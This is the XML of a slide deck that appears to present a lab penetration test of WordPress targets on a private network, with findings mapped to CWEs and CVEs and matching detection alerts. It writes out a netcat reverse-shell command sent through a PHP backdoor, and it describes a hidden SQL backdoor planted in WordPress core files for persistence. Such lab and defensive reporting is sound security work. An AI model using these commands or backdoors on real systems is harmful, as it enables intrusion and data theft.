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13716000" cx="2437765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 Black"/>
      <p:bold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Amatic SC"/>
      <p:regular r:id="rId62"/>
      <p:bold r:id="rId63"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inconsolata"/>
      <p:regular r:id="rId64"/>
      <p:bold r:id="rId65"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Poppins"/>
      <p:regular r:id="rId66"/>
      <p:bold r:id="rId67"/>
      <p:italic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Poppins Medium"/>
      <p:regular r:id="rId74"/>
      <p:bold r:id="rId75"/>
      <p:italic r:id="rId76"/>
      <p:boldItalic r:id="rId77"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>
      <p:regular r:id="rId78"/>
      <p:bold r:id="rId79"/>
      <p:italic r:id="rId80"/>
      <p:boldItalic r:id="rId81"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Helvetica Neue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3DC8B4-DDF1-43DA-9A97-AAE5D46FCC22}">
  <a:tblStyle styleId="{523DC8B4-DDF1-43DA-9A97-AAE5D46FCC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3.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-bold.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22.xml"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PoppinsMedium-regular.fntdata"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins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PoppinsMedium-italic.fntdata"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide27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6.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata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AmaticSC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64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inconsolata-regular.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/AmaticSC-bold.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-regular.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inconsolata-bold.fntdata"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins-italic.fntdata"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Poppins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3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2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7.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-bold.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Robot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cdfdb2ec29_0_8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cdfdb2ec2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d356f5674b_0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d356f567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dfdb2ec29_0_9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dfdb2ec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cdfdb2ec29_0_10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cdfdb2ec2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e0281d4ca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e0281d4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cdfdb2ec29_0_6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cdfdb2ec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cdfdb2ec29_0_7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cdfdb2ec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ce0281d4ca_0_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ce0281d4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dfdb2ec29_0_8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dfdb2ec2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ce0281d4ca_0_1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ce0281d4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ce0281d4ca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ce0281d4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d356f5674b_0_3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d356f567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d356f5674b_0_1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d356f567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d356f5674b_0_5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d356f567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d356f5674b_0_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d356f567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356f5674b_0_6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356f5674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d356f5674b_0_7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d356f5674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d356f5674b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d356f567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356f5674b_0_8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d356f567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d2ed493c6a_2_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d2ed493c6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cdfdb2ec29_0_6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cdfdb2ec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d356f5674b_0_9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d356f5674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cdfdb2ec29_0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cdfdb2ec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dfdb2ec29_0_2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dfdb2ec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cdfdb2ec29_0_3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cdfdb2ec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dfdb2ec29_0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dfdb2ec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cdfdb2ec29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cdfdb2ec2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image" Target="../media/image6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70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82.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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99.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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4.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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4.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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6.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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9.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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5" y="2424424"/>
            <a:ext cx="22914900" cy="4749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Duncan Andrews</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US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8079"/>
            <a:ext cx="24377649" cy="930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CWE-200 - Exposure of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1397" name="Google Shape;139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p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="1099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 Target 1, viewing HTML source in Firefox, reveals Flag 1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CWE-200 - Exposure of Sensitive Information</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1404" name="Google Shape;1404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5" name="Google Shape;1405;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="1937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 both targets, WPscan reveals Wordpress usernames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Provides an attacker usernames to use during password brute force attacks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06" name="Google Shape;14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2800"/>
            <a:ext cx="24377651" cy="884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12" name="Google Shape;1412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3" name="Google Shape;141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12750"/>
            <a:ext cx="19925160" cy="11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19" name="Google Shape;1419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0" name="Google Shape;14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720700"/>
            <a:ext cx="11599824" cy="1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6375" y="9118641"/>
            <a:ext cx="11599825" cy="3984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95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11177475" y="2295400"/>
            <a:ext cx="14485800" cy="7078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Michael’s account can read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/var/www/html/wordpress/wp-config.php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has Wordpress database credentials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(which happen to be the root MySQL user)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select, read, write and delete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 any data we want now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Flag 3 and Flag 4)</a:t>
            </a:r>
            <a:endParaRPr sz="4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CWE-521 - Weak Password Requirements</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1428" name="Google Shape;1428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9" name="Google Shape;1429;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="241569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Michael’s SSH password is the same as his username and easily guessed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Steven’s SSH and Wordpress password is weak and easily cracked with John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These credentials allow an attacker to access an SSH shell as either user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Seven’s credentials allow an attacker to access Wordpress admin - view all posts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30" name="Google Shape;14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00" y="6753225"/>
            <a:ext cx="24377651" cy="549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36" name="Google Shape;1436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7" name="Google Shape;143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651800"/>
            <a:ext cx="22281631" cy="115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43" name="Google Shape;1443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325" y="1716525"/>
            <a:ext cx="18667075" cy="114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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32800" y="0"/>
            <a:ext cx="249615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CWE-250 - Execution with Unnecessary Privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1450" name="Google Shape;1450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1" name="Google Shape;145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000"/>
            <a:ext cx="24377649" cy="1109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CWE-548: Exposure Through Directory Listing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1457" name="Google Shape;1457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8" name="Google Shape;14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728000"/>
            <a:ext cx="17290800" cy="9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9445000"/>
            <a:ext cx="19074526" cy="3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00"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20415000" y="8675375"/>
            <a:ext cx="2833500" cy="40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CVE-2016-10033 - PHPMailer RCE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1466" name="Google Shape;1466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7" name="Google Shape;1467;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="26958600" cy="124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Script, drops a PHP backdoor on the target, allowing shell commands as www-data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68" name="Google Shape;146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0" y="3543100"/>
            <a:ext cx="22577701" cy="95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5" name="Google Shape;1325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6" name="Google Shape;1326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Avoiding Detection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1331" name="Google Shape;1331;p8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CVE-2016-10033 - PHPMailer RCE</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1474" name="Google Shape;147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5" name="Google Shape;1475;p102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355925" y="2286750"/>
            <a:ext cx="29741100" cy="1906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raven.local/backdoor.php?cmd=nc%20192.168.1.90%204444%20-e%20%2Fbin%2Fbash</a:t>
            </a:r>
            <a:endParaRPr sz="4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76" name="Google Shape;147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75" y="3350875"/>
            <a:ext cx="22795701" cy="976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3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CWE-250 - Execution with Unnecessary Privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1482" name="Google Shape;1482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3" name="Google Shape;14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1713475"/>
            <a:ext cx="17417506" cy="113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03"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69150" y="3405475"/>
            <a:ext cx="8167500" cy="2601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Compiling and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linking the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dynamic library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from source code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04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CWE-250 - Execution with Unnecessary Privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1490" name="Google Shape;1490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1" name="Google Shape;14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325" y="1715175"/>
            <a:ext cx="14837224" cy="114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04"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69150" y="3405475"/>
            <a:ext cx="8167500" cy="765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the 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library to the required folder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the user defined SQL function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the function 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get a reverse shell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root user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05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CWE-250 - Execution with Unnecessary Privileges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1498" name="Google Shape;1498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9" name="Google Shape;149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100" y="1724950"/>
            <a:ext cx="11976100" cy="11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05"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1440750" y="3405475"/>
            <a:ext cx="10035300" cy="765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Receiving the reverse shell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Flag 4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/etc/shadow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6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CVE-2021-3156 - Baron Samedit Sudo Exploit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7" name="Google Shape;150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00" y="7758140"/>
            <a:ext cx="22858874" cy="531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88" y="3923250"/>
            <a:ext cx="22858875" cy="1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06"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1440750" y="2548900"/>
            <a:ext cx="22177500" cy="12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test returns a Segmentation Fault if Sudo is vulnerable to Baron Samedit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510" name="Google Shape;1510;p106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1440750" y="6485850"/>
            <a:ext cx="22728900" cy="12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Metasploit exploit failed with compiler error message requiring additional option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0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17" name="Google Shape;1517;p10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10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5" name="Google Shape;152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6948" y="0"/>
            <a:ext cx="5900705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50" y="4205000"/>
            <a:ext cx="18090924" cy="8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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="19491600" cy="1909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Count unique ports accessed on destination IP, by source IP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 &gt;= 60, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>within 1 minute</a:t>
            </a:r>
            <a:endParaRPr sz="4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p10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35" name="Google Shape;153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2" name="Google Shape;1542;p11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43" name="Google Shape;154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0" name="Google Shape;1550;p11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51" name="Google Shape;155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8" name="Google Shape;1338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9" name="Google Shape;1339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8" name="Google Shape;1558;p11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59" name="Google Shape;15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6" name="Google Shape;1566;p11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67" name="Google Shape;156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13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12326225" y="8409400"/>
            <a:ext cx="3469200" cy="540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03" y="0"/>
            <a:ext cx="6405341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- URI Scan Monitor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1575" name="Google Shape;1575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6" name="Google Shape;1576;p114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="3575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Count </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP status &gt;= 400, by source IP, by destination IP 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 &gt;= 400, within 5 minutes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577" name="Google Shape;157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6063482"/>
            <a:ext cx="17672250" cy="703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302" y="6174000"/>
            <a:ext cx="11954924" cy="657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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URI Scan Monitor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5" name="Google Shape;1585;p115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="22942800" cy="3402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Quiet option in Gobuster (-q) does not stop our alerts from firing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Writing a Python script to do this slowly would be quite easy (very slow to run!)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Evil blackhats with a botnet could do a distributed attack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rgbClr val="3D85C6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rgbClr val="3D85C6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mitigate distributed?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="3D85C6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The CPU and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="666666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broader HTTP error and request size </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="666666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alerts should still catch this</a:t>
            </a:r>
            <a:endParaRPr sz="4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1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2" name="Google Shape;1592;p11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Maintaining Access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1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0" name="Google Shape;1600;p117"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="107616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Reverse shell as root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It’s in this screenshot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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can you see it?</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="44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01" name="Google Shape;16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900" y="1713450"/>
            <a:ext cx="14634300" cy="113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8" name="Google Shape;1608;p118"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="107616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Reverse shell as root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rgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wp-blog-footer.php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hidden amongst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Wordpress core code</a:t>
            </a:r>
            <a:endParaRPr i="1"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09" name="Google Shape;160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900" y="1713450"/>
            <a:ext cx="14634300" cy="113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18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19253150" y="5905125"/>
            <a:ext cx="3882600" cy="4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(2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7" name="Google Shape;1617;p119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="229428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Recieves a base64 encoded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SQL query, via an HTTP post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Parses the Wordpress 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database credentials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from wp-config.php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Connects to the Wordpress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database and executes SQL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18" name="Google Shape;16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394" y="1731625"/>
            <a:ext cx="14490906" cy="119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20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32900" y="9753150"/>
            <a:ext cx="24443100" cy="3339000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F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(3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6" name="Google Shape;162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7325"/>
            <a:ext cx="15180574" cy="75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7425" y="2916325"/>
            <a:ext cx="9442876" cy="70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20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="15835200" cy="2785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Sending SQL, calling the user defined function,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that runs a system command for a reverse shell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2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35" name="Google Shape;1635;p12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For Listening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6" name="Google Shape;1636;p12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00" y="3762070"/>
            <a:ext cx="17860803" cy="934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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741100" y="1709950"/>
            <a:ext cx="7005900" cy="20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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18601900" y="1709950"/>
            <a:ext cx="5384400" cy="1102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8" name="Google Shape;1348;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18068500" y="1786150"/>
            <a:ext cx="6351000" cy="114837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Windows 10 Pro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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2900"/>
              <a:t>ML-RefVm-684427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192.168.1.90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Kali Linux 2020.1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Kali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192.168.1.100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Ubuntu 18.04.4 LTS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ELK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192.168.1.105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Ubuntu 18.04.1 LTS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Server1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192.168.1.110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Debian Linux 8.11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Target1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192.168.1.115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Debian Linux 8.11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Target2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0" name="Google Shape;1350;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483875" y="1786150"/>
            <a:ext cx="7005900" cy="26943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Address Range: 192.168.1.1-255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Netmask: 255.255.255.0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Gateway: 192.168.1.1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56" name="Google Shape;1356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7" name="Google Shape;1357;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703375" y="2295400"/>
            <a:ext cx="23471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</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="4400"/>
              <a:t>exclusive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> to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58" name="Google Shape;1358;p87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{523DC8B4-DDF1-43DA-9A97-AAE5D46FCC22}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7846925"/>
                <a:gridCol w="7448300"/>
                <a:gridCol w="7647600"/>
              </a:tblGrid>
              <a:tr h="8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Requirements</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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password easily guessed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Two passwords cracked with hashcat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in via SSH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Michael or Steven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in to Wordpress admin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Steven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CWE-250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with Unnecessary Privileges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Steven has permission to run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with sudo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privilege escalation to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5" name="Google Shape;1365;p88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6" name="Google Shape;1366;p88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{523DC8B4-DDF1-43DA-9A97-AAE5D46FCC22}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7846925"/>
                <a:gridCol w="7448300"/>
                <a:gridCol w="7647600"/>
              </a:tblGrid>
              <a:tr h="8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36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Sensitive Information to an Unauthorized Actor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1,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1 is publicly exposed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HTML page source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2,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1 is publicly exposed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raven.local/vendor/PATH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1 and Target 2</a:t>
                      </a:r>
                      <a:b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enumerates all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usernames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access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(Flag 1 and Wordpress usernames)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238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Information Through Directory Listing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enabled at</a:t>
                      </a:r>
                      <a:b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raven.local/vendor/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anyone to browse the files and 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directories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 this location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(2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3" name="Google Shape;1373;p89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4" name="Google Shape;1374;p89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{523DC8B4-DDF1-43DA-9A97-AAE5D46FCC22}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7846925"/>
                <a:gridCol w="7448300"/>
                <a:gridCol w="7647600"/>
              </a:tblGrid>
              <a:tr h="8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is accessing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MySQL database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MySQL root user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anyone with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 access to wp-config.php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directly run arbitrary commands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any database on the server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CVE-2016-10033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 before 5.2.18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mailSend function PHPMailer (before 5.2.18) might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code execution,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a \" in a crafted Sender property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run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commands and execute code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the www-data user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(3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90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2" name="Google Shape;1382;p90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{523DC8B4-DDF1-43DA-9A97-AAE5D46FCC22}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7846925"/>
                <a:gridCol w="7448300"/>
                <a:gridCol w="7647600"/>
              </a:tblGrid>
              <a:tr h="8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585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CWE-250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with Unnecessary Privileges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EDB-ID-1518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User-Defined Function (UDF) Dynamic Library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MySQL service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 running as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MySQL is running as root,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dynamic library can be installed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defined SQL function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function can be called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SQL,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system commands to be executed as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privilege escalation to root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26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CVE-2021-3156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Baron Samedit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Heap Buffer Overflow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Heap Buffer Overflow in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version of Sudo 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(1.8.10p3)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installed on the server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llows privilege escalation to root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9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89" name="Google Shape;1389;p9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0" name="Google Shape;1390;p9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